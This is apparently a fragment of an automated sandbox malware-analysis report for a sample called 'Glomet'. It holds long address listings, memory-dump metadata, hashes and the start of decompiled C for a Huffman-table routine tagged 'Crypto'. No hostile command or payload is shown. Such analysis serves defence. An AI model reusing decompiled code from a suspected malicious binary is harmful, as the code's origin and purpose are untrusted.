                                                                                                                                                                              0x00407030
                                                                                                                                                                              0x00407036
                                                                                                                                                                              0x00407038
                                                                                                                                                                              0x0040703b
                                                                                                                                                                              0x0040703d
                                                                                                                                                                              0x00407043
                                                                                                                                                                              0x00407045
                                                                                                                                                                              0x00407047
                                                                                                                                                                              0x00407049
                                                                                                                                                                              0x0040704b
                                                                                                                                                                              0x0040704e
                                                                                                                                                                              0x00407057
                                                                                                                                                                              0x0040705a
                                                                                                                                                                              0x0040705a
                                                                                                                                                                              0x00407050
                                                                                                                                                                              0x00407050
                                                                                                                                                                              0x00407053
                                                                                                                                                                              0x00407053
                                                                                                                                                                              0x0040704e
                                                                                                                                                                              0x00407045
                                                                                                                                                                              0x0040705c
                                                                                                                                                                              0x0040705e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040705e
                                                                                                                                                                              0x00406fdd
                                                                                                                                                                              0x00406fdd
                                                                                                                                                                              0x00406fe3
                                                                                                                                                                              0x00406fe9
                                                                                                                                                                              0x00406feb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406fed
                                                                                                                                                                              0x00406fed
                                                                                                                                                                              0x00406fef
                                                                                                                                                                              0x00406ff1
                                                                                                                                                                              0x00406ffa
                                                                                                                                                                              0x00406ffa
                                                                                                                                                                              0x00406ff3
                                                                                                                                                                              0x00406ff3
                                                                                                                                                                              0x00406ff6
                                                                                                                                                                              0x00406ff6
                                                                                                                                                                              0x00406ffc
                                                                                                                                                                              0x00406ffe
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407064
                                                                                                                                                                              0x00407064
                                                                                                                                                                              0x00407069
                                                                                                                                                                              0x0040706b
                                                                                                                                                                              0x0040706c
                                                                                                                                                                              0x0040706d
                                                                                                                                                                              0x0040706e
                                                                                                                                                                              0x00407074
                                                                                                                                                                              0x00407077
                                                                                                                                                                              0x0040707a
                                                                                                                                                                              0x0040707d
                                                                                                                                                                              0x0040707f
                                                                                                                                                                              0x00407085
                                                                                                                                                                              0x00407085
                                                                                                                                                                              0x00407088
                                                                                                                                                                              0x00407088
                                                                                                                                                                              0x00407088
                                                                                                                                                                              0x00407088
                                                                                                                                                                              0x00407091
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407096
                                                                                                                                                                              0x00407096
                                                                                                                                                                              0x00407099
                                                                                                                                                                              0x0040709c
                                                                                                                                                                              0x0040709e
                                                                                                                                                                              0x00407135
                                                                                                                                                                              0x00407135
                                                                                                                                                                              0x00407138
                                                                                                                                                                              0x0040713a
                                                                                                                                                                              0x0040713b
                                                                                                                                                                              0x0040713c
                                                                                                                                                                              0x0040713f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040713f
                                                                                                                                                                              0x004070a4
                                                                                                                                                                              0x004070a4
                                                                                                                                                                              0x004070aa
                                                                                                                                                                              0x004070ac
                                                                                                                                                                              0x004070d1
                                                                                                                                                                              0x004070d4
                                                                                                                                                                              0x004070da
                                                                                                                                                                              0x004070df
                                                                                                                                                                              0x004070e5
                                                                                                                                                                              0x004070eb
                                                                                                                                                                              0x004070ed
                                                                                                                                                                              0x004070f0
                                                                                                                                                                              0x004070f9
                                                                                                                                                                              0x004070ff
                                                                                                                                                                              0x004070ff
                                                                                                                                                                              0x004070f2
                                                                                                                                                                              0x004070f4
                                                                                                                                                                              0x004070f6
                                                                                                                                                                              0x004070f6
                                                                                                                                                                              0x00407101
                                                                                                                                                                              0x00407107
                                                                                                                                                                              0x00407109
                                                                                                                                                                              0x0040710c
                                                                                                                                                                              0x0040710e
                                                                                                                                                                              0x00407114
                                                                                                                                                                              0x00407116
                                                                                                                                                                              0x00407118
                                                                                                                                                                              0x0040711a
                                                                                                                                                                              0x0040711c
                                                                                                                                                                              0x0040711f
                                                                                                                                                                              0x00407128
                                                                                                                                                                              0x0040712b
                                                                                                                                                                              0x0040712b
                                                                                                                                                                              0x00407121
                                                                                                                                                                              0x00407121
                                                                                                                                                                              0x00407124
                                                                                                                                                                              0x00407124
                                                                                                                                                                              0x0040711f
                                                                                                                                                                              0x00407116
                                                                                                                                                                              0x0040712d
                                                                                                                                                                              0x0040712f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040712f
                                                                                                                                                                              0x004070ae
                                                                                                                                                                              0x004070ae
                                                                                                                                                                              0x004070b4
                                                                                                                                                                              0x004070ba
                                                                                                                                                                              0x004070bc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004070be
                                                                                                                                                                              0x004070be
                                                                                                                                                                              0x004070c0
                                                                                                                                                                              0x004070c2
                                                                                                                                                                              0x004070c9
                                                                                                                                                                              0x004070c9
                                                                                                                                                                              0x004070cb
                                                                                                                                                                              0x004070c4
                                                                                                                                                                              0x004070c4
                                                                                                                                                                              0x004070c6
                                                                                                                                                                              0x004070c6
                                                                                                                                                                              0x004070cd
                                                                                                                                                                              0x004070cf
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407147
                                                                                                                                                                              0x00407147
                                                                                                                                                                              0x0040714a
                                                                                                                                                                              0x0040714c
                                                                                                                                                                              0x0040714f
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406800
                                                                                                                                                                              0x004067e4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004067ea
                                                                                                                                                                              0x004067ed
                                                                                                                                                                              0x004067f7
                                                                                                                                                                              0x004067fa
                                                                                                                                                                              0x004067fd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004067fd
                                                                                                                                                                              0x004067e4
                                                                                                                                                                              0x00406808
                                                                                                                                                                              0x0040680b
                                                                                                                                                                              0x0040680f
                                                                                                                                                                              0x00406819
                                                                                                                                                                              0x00406823
                                                                                                                                                                              0x00406826
                                                                                                                                                                              0x0040682c
                                                                                                                                                                              0x00406960
                                                                                                                                                                              0x00406962
                                                                                                                                                                              0x00406968
                                                                                                                                                                              0x0040696b
                                                                                                                                                                              0x0040696e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040696e
                                                                                                                                                                              0x00406832
                                                                                                                                                                              0x00406832
                                                                                                                                                                              0x00406833
                                                                                                                                                                              0x0040688b
                                                                                                                                                                              0x0040688b
                                                                                                                                                                              0x00406892
                                                                                                                                                                              0x00406938
                                                                                                                                                                              0x00406938
                                                                                                                                                                              0x0040693d
                                                                                                                                                                              0x00406940
                                                                                                                                                                              0x00406945
                                                                                                                                                                              0x00406948
                                                                                                                                                                              0x0040694d
                                                                                                                                                                              0x00406950
                                                                                                                                                                              0x00406955
                                                                                                                                                                              0x00406958
                                                                                                                                                                              0x00406958
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x0040689c
                                                                                                                                                                              0x0040689c
                                                                                                                                                                              0x004068be
                                                                                                                                                                              0x004068c1
                                                                                                                                                                              0x004068c3
                                                                                                                                                                              0x004068c6
                                                                                                                                                                              0x004068cb
                                                                                                                                                                              0x004068a1
                                                                                                                                                                              0x004068a1
                                                                                                                                                                              0x004068a6
                                                                                                                                                                              0x004068a8
                                                                                                                                                                              0x004068aa
                                                                                                                                                                              0x004068af
                                                                                                                                                                              0x004068b5
                                                                                                                                                                              0x004068ba
                                                                                                                                                                              0x004068bc
                                                                                                                                                                              0x004068bc
                                                                                                                                                                              0x004068b1
                                                                                                                                                                              0x004068b1
                                                                                                                                                                              0x004068b1
                                                                                                                                                                              0x004068af
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004068cd
                                                                                                                                                                              0x004068fa
                                                                                                                                                                              0x004068ff
                                                                                                                                                                              0x00406901
                                                                                                                                                                              0x00406902
                                                                                                                                                                              0x00406904
                                                                                                                                                                              0x00406905
                                                                                                                                                                              0x00406905
                                                                                                                                                                              0x00406905
                                                                                                                                                                              0x0040692d
                                                                                                                                                                              0x00406932
                                                                                                                                                                              0x00406932
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406932
                                                                                                                                                                              0x004068cb
                                                                                                                                                                              0x00406892
                                                                                                                                                                              0x00406835
                                                                                                                                                                              0x00406835
                                                                                                                                                                              0x00406836
                                                                                                                                                                              0x00406880
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406880
                                                                                                                                                                              0x00406838
                                                                                                                                                                              0x00406839
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406995
                                                                                                                                                                              0x00406995
                                                                                                                                                                              0x00406995
                                                                                                                                                                              0x00406998
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406975
                                                                                                                                                                              0x00406975
                                                                                                                                                                              0x00406979
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040697f
                                                                                                                                                                              0x0040697f
                                                                                                                                                                              0x00406982
                                                                                                                                                                              0x00406985
                                                                                                                                                                              0x0040698a
                                                                                                                                                                              0x0040698c
                                                                                                                                                                              0x0040698f
                                                                                                                                                                              0x00406992
                                                                                                                                                                              0x00406992
                                                                                                                                                                              0x00406992
                                                                                                                                                                              0x0040699a
                                                                                                                                                                              0x0040699a
                                                                                                                                                                              0x0040699d
                                                                                                                                                                              0x0040699f
                                                                                                                                                                              0x004069a4
                                                                                                                                                                              0x004069a7
                                                                                                                                                                              0x004069a9
                                                                                                                                                                              0x004069ac
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004069b2
                                                                                                                                                                              0x004069b2
                                                                                                                                                                              0x004069b4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004069ba
                                                                                                                                                                              0x004069ba
                                                                                                                                                                              0x004069be
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004069c4
                                                                                                                                                                              0x004069c4
                                                                                                                                                                              0x004069c7
                                                                                                                                                                              0x004069c9
                                                                                                                                                                              0x00406a67
                                                                                                                                                                              0x00406a67
                                                                                                                                                                              0x00406a6a
                                                                                                                                                                              0x00406a6c
                                                                                                                                                                              0x00406a6c
                                                                                                                                                                              0x00406a6f
                                                                                                                                                                              0x00406a72
                                                                                                                                                                              0x00406a74
                                                                                                                                                                              0x00406a76
                                                                                                                                                                              0x00406a78
                                                                                                                                                                              0x00406a78
                                                                                                                                                                              0x00406a81
                                                                                                                                                                              0x00406a86
                                                                                                                                                                              0x00406a89
                                                                                                                                                                              0x00406a8c
                                                                                                                                                                              0x00406a8f
                                                                                                                                                                              0x00406a92
                                                                                                                                                                              0x00406a92
                                                                                                                                                                              0x00406a92
                                                                                                                                                                              0x00406a95
                                                                                                                                                                              0x00406a9b
                                                                                                                                                                              0x00406a9b
                                                                                                                                                                              0x00406aa1
                                                                                                                                                                              0x00406aa1
                                                                                                                                                                              0x00406aa1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406a95
                                                                                                                                                                              0x004069cf
                                                                                                                                                                              0x004069cf
                                                                                                                                                                              0x004069d5
                                                                                                                                                                              0x004069d8
                                                                                                                                                                              0x004069da
                                                                                                                                                                              0x00406a05
                                                                                                                                                                              0x00406a08
                                                                                                                                                                              0x00406a0e
                                                                                                                                                                              0x00406a13
                                                                                                                                                                              0x00406a19
                                                                                                                                                                              0x00406a1f
                                                                                                                                                                              0x00406a21
                                                                                                                                                                              0x00406a24
                                                                                                                                                                              0x00406a2d
                                                                                                                                                                              0x00406a33
                                                                                                                                                                              0x00406a33
                                                                                                                                                                              0x00406a26
                                                                                                                                                                              0x00406a28
                                                                                                                                                                              0x00406a2a
                                                                                                                                                                              0x00406a2a
                                                                                                                                                                              0x00406a35
                                                                                                                                                                              0x00406a3b
                                                                                                                                                                              0x00406a3e
                                                                                                                                                                              0x00406a40
                                                                                                                                                                              0x00406a42
                                                                                                                                                                              0x00406a48
                                                                                                                                                                              0x00406a4a
                                                                                                                                                                              0x00406a4c
                                                                                                                                                                              0x00406a4f
                                                                                                                                                                              0x00406a58
                                                                                                                                                                              0x00406a58
                                                                                                                                                                              0x00406a5a
                                                                                                                                                                              0x00406a51
                                                                                                                                                                              0x00406a51
                                                                                                                                                                              0x00406a54
                                                                                                                                                                              0x00406a54
                                                                                                                                                                              0x00406a5c
                                                                                                                                                                              0x00406a5c
                                                                                                                                                                              0x00406a4a
                                                                                                                                                                              0x00406a5f
                                                                                                                                                                              0x00406a61
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406a61
                                                                                                                                                                              0x004069dc
                                                                                                                                                                              0x004069dc
                                                                                                                                                                              0x004069e2
                                                                                                                                                                              0x004069e8
                                                                                                                                                                              0x004069ea
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004069ec
                                                                                                                                                                              0x004069ec
                                                                                                                                                                              0x004069ee
                                                                                                                                                                              0x004069f0
                                                                                                                                                                              0x004069f3
                                                                                                                                                                              0x004069fa
                                                                                                                                                                              0x004069fa
                                                                                                                                                                              0x004069fc
                                                                                                                                                                              0x004069f5
                                                                                                                                                                              0x004069f5
                                                                                                                                                                              0x004069f7
                                                                                                                                                                              0x004069f7
                                                                                                                                                                              0x004069fe
                                                                                                                                                                              0x00406a00
                                                                                                                                                                              0x00406a03
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406b07
                                                                                                                                                                              0x00406b0a
                                                                                                                                                                              0x00406b0d
                                                                                                                                                                              0x00406b13
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406cea
                                                                                                                                                                              0x00406cea
                                                                                                                                                                              0x00406cea
                                                                                                                                                                              0x00406ced
                                                                                                                                                                              0x00406cf0
                                                                                                                                                                              0x00406cf2
                                                                                                                                                                              0x00406cf5
                                                                                                                                                                              0x00406cfb
                                                                                                                                                                              0x00406d02
                                                                                                                                                                              0x00406d04
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406bd8
                                                                                                                                                                              0x00406bd8
                                                                                                                                                                              0x00406c00
                                                                                                                                                                              0x00406c00
                                                                                                                                                                              0x00406c00
                                                                                                                                                                              0x00406c02
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406be0
                                                                                                                                                                              0x00406be0
                                                                                                                                                                              0x00406be4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406bea
                                                                                                                                                                              0x00406bea
                                                                                                                                                                              0x00406bed
                                                                                                                                                                              0x00406bf0
                                                                                                                                                                              0x00406bf3
                                                                                                                                                                              0x00406bf5
                                                                                                                                                                              0x00406bf7
                                                                                                                                                                              0x00406bfa
                                                                                                                                                                              0x00406bfd
                                                                                                                                                                              0x00406bfd
                                                                                                                                                                              0x00406bfd
                                                                                                                                                                              0x00406c04
                                                                                                                                                                              0x00406c04
                                                                                                                                                                              0x00406c0c
                                                                                                                                                                              0x00406c0f
                                                                                                                                                                              0x00406c15
                                                                                                                                                                              0x00406c18
                                                                                                                                                                              0x00406c1c
                                                                                                                                                                              0x00406c20
                                                                                                                                                                              0x00406c23
                                                                                                                                                                              0x00406c26
                                                                                                                                                                              0x00406c3e
                                                                                                                                                                              0x00406c3e
                                                                                                                                                                              0x00406c41
                                                                                                                                                                              0x00406c4f
                                                                                                                                                                              0x00406c52
                                                                                                                                                                              0x00406c43
                                                                                                                                                                              0x00406c43
                                                                                                                                                                              0x00406c45
                                                                                                                                                                              0x00406c4c
                                                                                                                                                                              0x00406c4c
                                                                                                                                                                              0x00406c7b
                                                                                                                                                                              0x00406c7b
                                                                                                                                                                              0x00406c7b
                                                                                                                                                                              0x00406c7e
                                                                                                                                                                              0x00406c80
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406c5b
                                                                                                                                                                              0x00406c5b
                                                                                                                                                                              0x00406c5f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406c65
                                                                                                                                                                              0x00406c65
                                                                                                                                                                              0x00406c68
                                                                                                                                                                              0x00406c6b
                                                                                                                                                                              0x00406c6e
                                                                                                                                                                              0x00406c70
                                                                                                                                                                              0x00406c72
                                                                                                                                                                              0x00406c75
                                                                                                                                                                              0x00406c78
                                                                                                                                                                              0x00406c78
                                                                                                                                                                              0x00406c78
                                                                                                                                                                              0x00406c82
                                                                                                                                                                              0x00406c82
                                                                                                                                                                              0x00406c84
                                                                                                                                                                              0x00406c86
                                                                                                                                                                              0x00406c91
                                                                                                                                                                              0x00406c94
                                                                                                                                                                              0x00406c97
                                                                                                                                                                              0x00406c99
                                                                                                                                                                              0x00406c9b
                                                                                                                                                                              0x00406c9d
                                                                                                                                                                              0x00406ca0
                                                                                                                                                                              0x00406ca3
                                                                                                                                                                              0x00406ca8
                                                                                                                                                                              0x00406cab
                                                                                                                                                                              0x00406cae
                                                                                                                                                                              0x00406cb1
                                                                                                                                                                              0x00406cb8
                                                                                                                                                                              0x00406cbb
                                                                                                                                                                              0x00406cbd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406cc3
                                                                                                                                                                              0x00406cc3
                                                                                                                                                                              0x00406cc7
                                                                                                                                                                              0x00406cd8
                                                                                                                                                                              0x00406cd8
                                                                                                                                                                              0x00406cd8
                                                                                                                                                                              0x00406cda
                                                                                                                                                                              0x00406cda
                                                                                                                                                                              0x00406cde
                                                                                                                                                                              0x00406cde
                                                                                                                                                                              0x00406cde
                                                                                                                                                                              0x00406ce0
                                                                                                                                                                              0x00406ce1
                                                                                                                                                                              0x00406ce4
                                                                                                                                                                              0x00406ce4
                                                                                                                                                                              0x00406ce4
                                                                                                                                                                              0x00406ce7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406ce7
                                                                                                                                                                              0x00406cc9
                                                                                                                                                                              0x00406cc9
                                                                                                                                                                              0x00406ccc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406cd2
                                                                                                                                                                              0x00406cd2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406cd2
                                                                                                                                                                              0x00406c28
                                                                                                                                                                              0x00406c28
                                                                                                                                                                              0x00406c2a
                                                                                                                                                                              0x00406c2c
                                                                                                                                                                              0x00406c2f
                                                                                                                                                                              0x00406c32
                                                                                                                                                                              0x00406c36
                                                                                                                                                                              0x00406c36
                                                                                                                                                                              0x00406d0a
                                                                                                                                                                              0x00406d0a
                                                                                                                                                                              0x00406d0d
                                                                                                                                                                              0x00406d14
                                                                                                                                                                              0x00406d18
                                                                                                                                                                              0x00406d1a
                                                                                                                                                                              0x00406d1d
                                                                                                                                                                              0x00406d20
                                                                                                                                                                              0x00406d25
                                                                                                                                                                              0x00406d28
                                                                                                                                                                              0x00406d2a
                                                                                                                                                                              0x00406d2b
                                                                                                                                                                              0x00406d2e
                                                                                                                                                                              0x00406d39
                                                                                                                                                                              0x00406d3c
                                                                                                                                                                              0x00406d53
                                                                                                                                                                              0x00406d58
                                                                                                                                                                              0x00406d5f
                                                                                                                                                                              0x00406d64
                                                                                                                                                                              0x00406d68
                                                                                                                                                                              0x00406d6a
                                                                                                                                                                              0x00406d6a
                                                                                                                                                                              0x00406d6a
                                                                                                                                                                              0x00406d6d
                                                                                                                                                                              0x00406d6f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406d75
                                                                                                                                                                              0x00406d75
                                                                                                                                                                              0x00406d79
                                                                                                                                                                              0x00406d84
                                                                                                                                                                              0x00406d97
                                                                                                                                                                              0x00406d9c
                                                                                                                                                                              0x00406da1
                                                                                                                                                                              0x00406da3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406da9
                                                                                                                                                                              0x00406da9
                                                                                                                                                                              0x00406dac
                                                                                                                                                                              0x00406dae
                                                                                                                                                                              0x00406dbc
                                                                                                                                                                              0x00406dbc
                                                                                                                                                                              0x00406dbf
                                                                                                                                                                              0x00406dbf
                                                                                                                                                                              0x00406dc2
                                                                                                                                                                              0x00406dc5
                                                                                                                                                                              0x00406dc8
                                                                                                                                                                              0x00406dcb
                                                                                                                                                                              0x00406dce
                                                                                                                                                                              0x00406dd1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406dd1
                                                                                                                                                                              0x00406db0
                                                                                                                                                                              0x00406db0
                                                                                                                                                                              0x00406db6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406db6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407155
                                                                                                                                                                              0x00407155
                                                                                                                                                                              0x0040715b
                                                                                                                                                                              0x00407161
                                                                                                                                                                              0x00407166
                                                                                                                                                                              0x0040716c
                                                                                                                                                                              0x00407172
                                                                                                                                                                              0x00407174
                                                                                                                                                                              0x00407177
                                                                                                                                                                              0x00407180
                                                                                                                                                                              0x00407186
                                                                                                                                                                              0x00407186
                                                                                                                                                                              0x00407179
                                                                                                                                                                              0x0040717b
                                                                                                                                                                              0x0040717d
                                                                                                                                                                              0x0040717d
                                                                                                                                                                              0x00407188
                                                                                                                                                                              0x0040718a
                                                                                                                                                                              0x0040718d
                                                                                                                                                                              0x004071c8
                                                                                                                                                                              0x004071c8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040718f
                                                                                                                                                                              0x0040718f
                                                                                                                                                                              0x0040718f
                                                                                                                                                                              0x00407195
                                                                                                                                                                              0x00407198
                                                                                                                                                                              0x0040719a
                                                                                                                                                                              0x004071cf
                                                                                                                                                                              0x004071d1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004071d1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040719a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004067d9
                                                                                                                                                                              0x004071a7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004071a7
                                                                                                                                                                              0x00406bbb
                                                                                                                                                                              0x00406bbd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406bbf
                                                                                                                                                                              0x00406bbf
                                                                                                                                                                              0x00406bc2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406bc2
                                                                                                                                                                              0x00406b07
                                                                                                                                                                              0x00406ac8
                                                                                                                                                                              0x004071ac
                                                                                                                                                                              0x004071af
                                                                                                                                                                              0x004071b1
                                                                                                                                                                              0x004071ba
                                                                                                                                                                              0x004071c0
                                                                                                                                                                              0x00000000

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                                                                                                              • Instruction ID: c3f2784b42629965e79a9deb6a6c5a882cbc70a40949ec996fd179ba06f8b65e
                                                                                                                                                                              • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                                                                                                              • Instruction Fuzzy Hash: EBE1BB71904719DFDB24CF58C880BAAB7F1FB45305F11852EE497A72C1E738AA91CB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 0040727F Relevance: .3, Instructions: 300COMMONCrypto
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040727F(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
